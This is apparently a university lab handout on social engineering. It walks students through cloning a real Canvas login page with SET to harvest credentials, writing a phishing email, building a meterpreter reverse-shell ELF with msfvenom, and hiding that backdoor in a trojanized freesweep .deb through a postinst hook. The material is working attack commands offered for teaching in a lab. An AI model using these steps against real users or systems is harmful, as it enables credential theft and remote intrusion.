Lab 8 - Social Engineering

In this lab you are going to perform social engineering activities using the Social-Engineer Toolkit (SET).

"The Social-Engineer Toolkit is an open-source penetration testing framework designed for social engineering. SET has a number of custom attack vectors that allow you to make a believable attack quickly." - https://github.com/trustedsec/social-engineer-toolkit

Note: A key selling point of many SET features is that you can get an attack for testing and demonstration purposes very quickly. Are they believable? Well..... Let's just say additional effort is required to go from script kiddie level to an attack with a real chance of success, and that would be accomplished by other tools (and custom tools), not by using the SET software.

So, with the understanding that SET is more for "fun demos", let's go!

Activities

Part 1 - Credential Harvesting via Site Cloner

Run the Social-Engineer Toolkit

$ sudo setoolkit 
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XX                                                                          XX
XX   MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM   XX
XX   MMMMMMMMMMMMMMMMMMMMMssssssssssssssssssssssssssMMMMMMMMMMMMMMMMMMMMM   XX
XX   MMMMMMMMMMMMMMMMss'''                          '''ssMMMMMMMMMMMMMMMM   XX
XX   MMMMMMMMMMMMyy''                                    ''yyMMMMMMMMMMMM   XX
XX   MMMMMMMMyy''                                            ''yyMMMMMMMM   XX
XX   MMMMMy''                                                    ''yMMMMM   XX
XX   MMMy'                                                          'yMMM   XX
XX   Mh'                                                              'hM   XX
XX   -                                                                  -   XX
XX                                                                          XX
XX   ::                                                                ::   XX
XX   MMhh.        ..hhhhhh..                      ..hhhhhh..        .hhMM   XX
XX   MMMMMh   ..hhMMMMMMMMMMhh.                .hhMMMMMMMMMMhh..   hMMMMM   XX
XX   ---MMM .hMMMMdd:::dMMMMMMMhh..        ..hhMMMMMMMd:::ddMMMMh. MMM---   XX
XX   MMMMMM MMmm''      'mmMMMMMMMMyy.  .yyMMMMMMMMmm'      ''mmMM MMMMMM   XX
XX   ---mMM ''             'mmMMMMMMMM  MMMMMMMMmm'             '' MMm---   XX
XX   yyyym'    .              'mMMMMm'  'mMMMMm'              .    'myyyy   XX
XX   mm''    .y'     ..yyyyy..  ''''      ''''  ..yyyyy..     'y.    ''mm   XX
XX           MN    .sMMMMMMMMMss.   .    .   .ssMMMMMMMMMs.    NM           XX
XX           N`    MMMMMMMMMMMMMN   M    M   NMMMMMMMMMMMMM    `N           XX
XX            +  .sMNNNNNMMMMMN+   `N    N`   +NMMMMMNNNNNMs.  +            XX
XX              o+++     ++++Mo    M      M    oM++++     +++o              XX
XX                                oo      oo                                XX
XX           oM                 oo          oo                 Mo           XX
XX         oMMo                M              M                oMMo         XX
XX       +MMMM                 s              s                 MMMM+       XX
XX      +MMMMM+            +++NNNN+        +NNNN+++            +MMMMM+      XX
XX     +MMMMMMM+       ++NNMMMMMMMMN+    +NMMMMMMMMNN++       +MMMMMMM+     XX
XX     MMMMMMMMMNN+++NNMMMMMMMMMMMMMMNNNNMMMMMMMMMMMMMMNN+++NNMMMMMMMMM     XX
XX     yMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMy     XX
XX   m  yMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMy  m   XX
XX   MMm yMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMy mMM   XX
XX   MMMm .yyMMMMMMMMMMMMMMMM     MMMMMMMMMM     MMMMMMMMMMMMMMMMyy. mMMM   XX
XX   MMMMd   ''''hhhhh       odddo          obbbo        hhhh''''   dMMMM   XX
XX   MMMMMd             'hMMMMMMMMMMddddddMMMMMMMMMMh'             dMMMMM   XX
XX   MMMMMMd              'hMMMMMMMMMMMMMMMMMMMMMMh'              dMMMMMM   XX
XX   MMMMMMM-               ''ddMMMMMMMMMMMMMMdd''               -MMMMMMM   XX
XX   MMMMMMMM                   '::dddddddd::'                   MMMMMMMM   XX
XX   MMMMMMMM-                                                  -MMMMMMMM   XX
XX   MMMMMMMMM                                                  MMMMMMMMM   XX
XX   MMMMMMMMMy                                                yMMMMMMMMM   XX
XX   MMMMMMMMMMy.                                            .yMMMMMMMMMM   XX
XX   MMMMMMMMMMMMy.                                        .yMMMMMMMMMMMM   XX
XX   MMMMMMMMMMMMMMy.                                    .yMMMMMMMMMMMMMM   XX
XX   MMMMMMMMMMMMMMMMs.                                .sMMMMMMMMMMMMMMMM   XX
XX   MMMMMMMMMMMMMMMMMMss.           ....           .ssMMMMMMMMMMMMMMMMMM   XX
XX   MMMMMMMMMMMMMMMMMMMMNo         oNNNNo         oNMMMMMMMMMMMMMMMMMMMM   XX
XX                                                                          XX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
    .o88o.                               o8o                .
    888 `"                               `"'              .o8
   o888oo   .oooo.o  .ooooo.   .ooooo.  oooo   .ooooo.  .o888oo oooo    ooo
    888    d88(  "8 d88' `88b d88' `"Y8 `888  d88' `88b   888    `88.  .8'
    888    `"Y88b.  888   888 888        888  888ooo888   888     `88..8'
    888    o.  )88b 888   888 888   .o8  888  888    .o   888 .    `888'
   o888o   8""888P' `Y8bod8P' `Y8bod8P' o888o `Y8bod8P'   "888"      d8'
                                                                .o...P'
                                                                `XER0'

[---]        The Social-Engineer Toolkit (SET)         [---]                                                               
[---]        Created by: David Kennedy (ReL1K)         [---]                                                               
                      Version: 8.0.3                                                                                       
                    Codename: 'Maverick'                                                                                   
[---]        Follow us on Twitter: @TrustedSec         [---]                                                               
[---]        Follow me on Twitter: @HackingDave        [---]                                                               
[---]       Homepage: https://www.trustedsec.com       [---]                                                               
        Welcome to the Social-Engineer Toolkit (SET).                                                                      
         The one stop shop for all of your SE needs.                                                                       

   The Social-Engineer Toolkit is a product of TrustedSec.                                                                 

           Visit: https://www.trustedsec.com                                                                               

   It's easy to update using the PenTesters Framework! (PTF)
Visit https://github.com/trustedsec/ptf to update all your tools!                                                          

 Select from the menu:

   1) Social-Engineering Attacks
   2) Penetration Testing (Fast-Track)
   3) Third Party Modules
   4) Update the Social-Engineer Toolkit
   5) Update SET configuration
   6) Help, Credits, and About

  99) Exit the Social-Engineer Toolkit

set> 

Select the desired mode of operation:

set> 1   # For "Social-Engineering Attacks"
set> 2   # For "Website Attack Vectors"
set:webattack> 3   # For "Credential Harvester Attack"
set:webattack> 2   # For "Site Cloner"

The Credential Harvester method will utilize web cloning of a website that has a username and password field and harvest all the information posted to the website.

Enter the IP address that you want the stolen credentials to be sent to. The default IP here is probably fine - it's the IP of your Kali box running SET.

set:webattack> aaa.bbb.ccc.ddd

Enter the website that you wish to clone

set:webattack> https://pacific.instructure.com/login/ldap

Launch the web browser in Kali and visit your cloned page at http://aaa.bbb.ccc.ddd

Enter a fake username and password, and confirm that you see those credentials in the SET console.

Note that the cloned website redirects to the real Canvas login page after swiping the credentials.

The user just assumes they entered the wrong login, tries again, and is in Canvas. Will they be suspicious? How many times have you entered a wrong password?

Deliverables:

  • Upload the XML report that SET produces with all the stolen credentials. You'll need to stop the collection process via CTRL-C.

While this is a fun example, the out-of-the-box SET experience is not particularly convincing. There are a number of issues.

Deliverables:

  • Issue 1: Look at the URL of your cloned site: http://aaa.bbb.ccc.ddd. Is that IP address suitable for a real social engineering attack out across the Internet? Try accessing it from your phone if you're unsure. Why doesn't it work? (See: Background reading)
  • Issue 1 (continued): How might you solve the IP address issue in the previous question?
  • Issue 2: Look at the URL of your cloned site again: http://aaa.bbb.ccc.ddd. An ugly IP address. Even 25% of moms would notice that looks suspicious or unusual. How could you remedy this problem?
  • Issue 3: Look at the URL of your cloned site again: http://aaa.bbb.ccc.ddd. HTTP. That's not encrypted. Web browsers are increasingly assertive with labeling such pages as not secure with a variety of warning labels or icons. Maybe 15% of moms would notice that. How could you solve this problem? (And, even better, solve this problem for a cost of $0.00?)

Part 2 - Email Blast

Let's say we have the cloned credential harvesting site, and it's doing a credible job masquerading as a legitimate site (after addressing issues 1-3 above with reasonable solutions). How do we get victims (er, client employees who we have explicit written permission to test) to visit our site? Let's send them an email and bait them to click it.

The Social-Engineer Toolkit has a "Mass Mailer" module where it can send out emails of your own design. Actually using this module (or any other mass mailing program) effectively, however, is a challenge. What you would love to do is generate fake emails coming from ceo@company.com or tech-support@company.com, but you'll quickly run into the same kinds of technological filtering and restrictions used to inhibit spammers.

One such anti-spam technology is Sender Policy Framework (SPF).

Deliverables:

  • Describe SPF, in your own words. (1 paragraph)
  • Using any number of available websites, generate a SPF rule for the domain company.com, specifying that IP address 123.45.67.89 is allowed to send email for this domain, and also that host gmail.com is also allowed to send email for this domain. Note: There are other more-detailed SPF options. I don't care how you set them.

As an example, the SPF rule for pacific.edu is v=spf1 ip4:138.9.110.0/25 ip4:208.117.48.237 ip4:176.31.145.254 include:spf.protection.outlook.com ....(more hosts).... ~all

Another such anti-spam technology is DomainKeys Identified Mail (DKIM).

Deliverables:

  • Describe DKIM, in your own words. (1 paragraph)

Finally, Domain-based Message Authentication, Reporting, and Conformance (DMARC) is a third anti-spam technology closely related to the first two.

Deliverables:

  • Describe DMARC, in your own words. (1 paragraph)

Note that none of these systems are guarantees. The receiver of an email could choose to disregard these systems and deliver a fraudulent message anyway. Or, more likely, the receiver uses information from these systems as data points in a larger anti-spam system that examines the content of the message, the reputation of the server sending the email, the user history in flagging previous messages as spam, and proprietary trade secrets built on decades of experience, when deciding whether to deliver the message to a user inbox. Even new legitimate senders have significant challenges in reliably delivering emails to @gmail.com, @outlook.com, and other large mail services.

Because of these challenges, you'll often see phishing attacks coming from ceo@fakecompany.com, or ceo-fakecompany@gmail.com, or ceo@company.fake.com, as those are more likely to be delivered. Of course, if you have already have some access to the corporate network after earlier pen testing activities, you could send emails out using the legitimate corporate email server. But that's a chicken and egg problem - often times you're using social engineering attacks to gain initial access to the network.

Deliverables:

  • Using your own personal email, create a high quality phishing email that would plausibly induce a "typical university student" to click on a link and take some action. Send it to yourself to ensure it's correctly formatted. Then, save the email as a .eml or .html file and attach it here. In gmail, the "download message" feature under the ". . ." icon will do this. Other mail clients have an export or save-as feature.

Part 3 - Payloads via msfvenom

Metasploit includes a tool - msfvenom - that can package Metasploit exploits into stand-alone executables that a user can be tricked into running via a social engineering attack.

To see a list of all available payloads, do:

$ msfvenom --list payloads

It's a long list, and the same list of available payloads that Metasploit normally has available to run after an exploit. Just, this time no exploit is needed, since we're using social engineering to trick the user into running the payload.

To see a list of available output formats, CPU architectures, and platforms, do:

$ msfvenom --list formats
$ msfvenom --list archs
$ msfvenom --list platforms

Make an executable that is runnable on our Metasploitable2 VM, a Linux host. That would be the .elf file type. (Windows would be .exe). Pick a payload from the list that works on Linux, and ask msfvenom to package it for you and save it to /tmp/LegitProgram. This payload is hardwired to connect back to the LHOST IP address, which should be Kali's IP:

$ msfvenom --payload linux/x86/meterpreter_reverse_tcp \
--arch x86 \
--format elf \
--platform linux \
LHOST=aaa.bbb.ccc.ddd \
LPORT=5678 \
> /tmp/LegitProgram

Tip 1: For clarity, this long command was split into multiple lines with the Bash "line continuation" character \. Keep that character in if you enter the multi-line command, or omit it if you enter the command as a single line.
Tip 2: Did your console fill up with "gibberish" when you ran this? Then you didn't correctly redirect the output (using >) to the file /tmp/LegitProgram, and thus msfvenom output the executable file to standard output instead.

Change to the /tmp directory, and start a simple webserver in Kali to host this "LegitProgram" binary. We're using this as a way to get the binary on the target machine since we're in control of both sides, but in reality this would be accomplished through some social engineering attack.

$ cd /tmp 
$ python2 -m SimpleHTTPServer 8888    # Built-in webserver in Python 2
#  python3 -m http.server 8888        # Alternate command: Built-in webserver in Python 3

Over on your Metasploitable2 VM, download the file from the webserver running in the Kali VM:

$ wget aaa.bbb.ccc.dddd:8888/LegitProgram

Warning: If you have to re-run this wget command for any reason and leave the original file in place, the next file will be named LegitProgram.1, LegitiProgram.2, etc, as shown in the wget output. Either delete the older copy prior to running wget again, or make a note of what the most recent file name is.

At this point, you can CTRL-C on the webserver, we don't need it any more.

Run metasploit

$ sudo service postgresql start
$ msfconsole

Use the generic payload handler that provides Metasploit features to exploits run outside of the framework. Configure it for the payload you just downloaded on the target VM, as it needs to know

  • What payload is incoming
  • What IP the payload is connecting to, and
  • What port the payload is connecting to.
msf6>  use exploit/multi/handler
msf6>  set PAYLOAD linux/x86/meterpreter_reverse_tcp
msf6>  set LHOST aaa.bbb.ccc.ddd
msf6>  set LPORT 5678
msf6>  set ExitOnSession false

Run this service in the background as a job.

msf6> exploit -j

Now, over in the Metasploitable2 VM, run the payload.

$ chmod +x LegitProgram     # Needs to be marked as executable
$ ./LegitProgram

Back in Kali, you should see a notice that a new session was opened.

[*] Meterpreter session 1 opened (172.16.196.2:5678 -> 172.16.196.4:33423) at 2021-02-07 00:20:41 -0800
msf6> sessions --list
msf6> sessions -i X   # where X = number of Meterpreter session

Deliverables:

  • Submit a screenshot of your Kali msfconsole showing an active meterpreter session
  • Submit a screenshot of your Kali meterpreter showing the output of "sysinfo"
  • Submit a screenshot of your Metasploitable2 VM console showing the "LegitProgram" running.

In Kali, you can quit the Meterpreter session with the quit command. In addition, you can view the listening handler with jobs and then kill that listener with kill # (where # is the job ID number)

Part 4 - Payload Obfuscation

Rather than coax the user into running a program that is exclusively a back door (which might make them suspicious), what if the backdoor is bundled with some legitimate program? Let's build an Linux installer package (.deb file) for the minesweeper game "freesweep", but include an extra surprise in the bundle.

Based off of this tutorial, but with bugfixes. :) https://www.offensive-security.com/metasploit-unleashed/binary-linux-trojan/

First, on Kali, download the legitimate .deb file from the package manager. Since we're going to run this on the OLD Metasploitable2 VM (32-bit), let's just grab the correct binary out of the Ubuntu archives. That way, the dynamic library dependencies will work out OK.

$ mkdir -p /tmp/working
$ cd /tmp/working
$ wget http://old-releases.ubuntu.com/ubuntu/pool/universe/f/freesweep/freesweep_0.88-4.3_i386.deb

Second, extract the files into that working directory

$ dpkg -x freesweep_0.88-4.3_i386.deb package

Third, add a DEBIAN directory to contain the "extra surprise" we are included in this package

$ mkdir /tmp/working/package/DEBIAN

In the DEBIAN directory, create a new file called control with the following contents:

$ nano /tmp/working/package/DEBIAN/control
Package: freesweep
Version: 0.88-4.3
Section: Games and Amusement
Priority: optional
Architecture: i386
Maintainer: Ubuntu MOTU Developers (ubuntu-motu@lists.ubuntu.com)
Description: a text-based minesweeper
 Freesweep is an implementation of the popular minesweeper game, where
 one tries to find all the mines without igniting any, based on hints given
 by the computer. Unlike most implementations of this game, Freesweep
 works in any visual text display - in Linux console, in an xterm, and in
 most text-based terminals currently in use.

In the DEBIAN directory, create a post-installation script called postinst with the following commands that

  • Change the permissions of the innocently-named "freesweep_scores" to include the execute flag
  • Run the innocently-named "freesweep_scores", and
  • Run the legitimate freesweep program
#!/bin/sh
sudo chmod 2755 /usr/games/freesweep_scores && /usr/games/freesweep_scores & /usr/games/freesweep

Make this script executable

$ chmod +x /tmp/working/package/DEBIAN/postinst

Now, generate our backdoor program "freesweep_scores":

$ msfvenom --payload linux/x86/meterpreter_reverse_tcp \
--arch x86 \
--format elf \
--platform linux \
LHOST=aaa.bbb.ccc.ddd \
LPORT=5678 \
--out /tmp/working/package/usr/games/freesweep_scores

Finally, build the new .deb file with the backdoor program:

$ cd /tmp/working/package/DEBIAN
$ dpkg-deb -Zgzip --build /tmp/working/package
# -Zgzip is needed because Metasploitable2 OS is much older than Kali's, and
# package manager doesn't know how to uncompress newer .deb files

Rename the output back into the original freesweep.deb file name (no one suspects a thing!), and move it to /tmp

$ mv /tmp/working/package.deb /tmp/freesweep.deb
$ cd /tmp

As you did in the previous section: Run the web server and copy the new freesweep.deb to your Metasploitable2 VM with wget.

Warning: If you have to re-run this wget command for any reason and leave the original file in place, the next file will be named freesweep.deb.1, freesweep.deb.2, etc, as shown in the wget output. Either delete the older copy prior to running wget again, or make a note of what the most recent file name is.

As you did in the previous section: Run Metasploit and launch the exploit/multi/handler with the correct options to listen for an incoming connection. Or, if msfconsole is still active, the hander may be still running.

On the Metasploitable2 VM, install this super fun game your friend sent you!

$ sudo dpkg -i freesweep.deb
# Oh look, the game started automatically! 
# Let's play, this looks fun! 

On Kali, view the active sessions

msf6> sessions --list
msf6> sessions -i  x
meterpreter> sysinfo

Troubleshooting:

Did something go wrong in your steps? To clear out metasploitable2 and start again:

$ sudo apt-get remove freesweep
$ rm freesweep.deb
# And download a fixed .deb file and try installing it again

You can verify that your copy of freesweep.deb contains your backdoor program with dpkg -c freesweep.deb.

Deliverables:

  • Submit a screenshot of Metasploitable2 showing the game running
  • Submit a screenshot of Kali showing the active meterpreter session
  • What is the md5 checksum of the original freesweep .deb file downloaded from the repository? Use the md5sum command
  • What is the md5 checksum of the modified freesweep.deb file that also includes the backdoor program "freesweep_scores"? Use the md5sum command